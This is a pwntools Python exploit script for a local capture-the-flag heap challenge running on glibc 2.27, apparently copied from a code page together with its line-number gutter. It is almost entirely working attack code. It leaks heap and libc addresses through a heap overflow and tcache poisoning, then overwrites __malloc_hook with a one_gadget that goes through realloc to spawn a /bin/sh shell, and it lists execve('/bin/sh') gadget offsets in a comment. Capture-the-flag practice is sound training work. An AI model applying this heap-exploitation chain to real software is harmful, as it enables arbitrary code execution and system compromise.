1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81
|
from pwn import * context(arch = 'amd64',os = 'linux') elf = ELF("./chall") libc = ELF("/home/shoucheng/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/libc-2.27.so")
ld = ELF("/home/shoucheng/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/ld-2.27.so") p = process(argv=[ld.path,elf.path],env={"LD_PRELOAD" : libc.path})
def debug(): gdb.attach(p,"b main")
def add(size,content): p.recvuntil(">>> ") p.send("opcode:1\npasswd:Cr4at31\n\r\r\n") p.recvuntil(">>> ") p.sendline(str(size)) p.recvuntil(">>> ") p.send(content) def edit(idx,content): p.recvuntil(">>> ") p.send("opcode:3\npasswd:Ed1t1\n\r\r\n") p.recvuntil(">>> ") p.sendline(str(idx)) p.recvuntil(">>> ") p.send(content)
def show(idx): p.recvuntil(">>> ") p.send("opcode:2\npasswd:SH0w1\n\r\r\n") p.recvuntil(">>> ") p.sendline(str(idx))
def free(idx): p.recvuntil(">>> ") p.send("opcode:4\npasswd:D3l4te1\n\r\r\n") p.recvuntil(">>> ") p.sendline(str(idx))
''' 0x4f3d5 execve("/bin/sh", rsp+0x40, environ) constraints: rsp & 0xf == 0 rcx == NULL
0x4f432 execve("/bin/sh", rsp+0x40, environ) constraints: [rsp+0x40] == NULL
0x10a41c execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL '''
add(0x208, 'c'*0x208) add(0x208, 'b'*0x208) add(0x208, 'a'*0x208) show(0) p.recvuntil('a'*0x208) heap_addr = u64(p.recv(6).ljust(8,'\x00')) - 0x4c0 log.info("heap_addr==>0x%x" %heap_addr) for i in range(5): add(0x208,'a'*0x208) for i in range(7): free(0) free(0) add(0x208,'a'*0x208) edit(0,'a'*0x208 + p64(heap_addr + 0x2e0)) show(1) libc_base = u64(p.recv(6).ljust(8,'\x00')) - 0x3ebca0 log.info("libc_base==>0x%x" %libc_base) mlh = libc_base + libc.sym['__malloc_hook'] realloc = libc_base + libc.sym['__libc_realloc'] ogg = libc_base + 0x4f432 edit(0, 'a'*0x208 + p64(mlh - 0x8)) edit(1, p64(ogg) + p64(realloc + 9)) p.recvuntil(">>> ") p.send("opcode:1\npasswd:Cr4at31\n\r\r\n") p.interactive()
|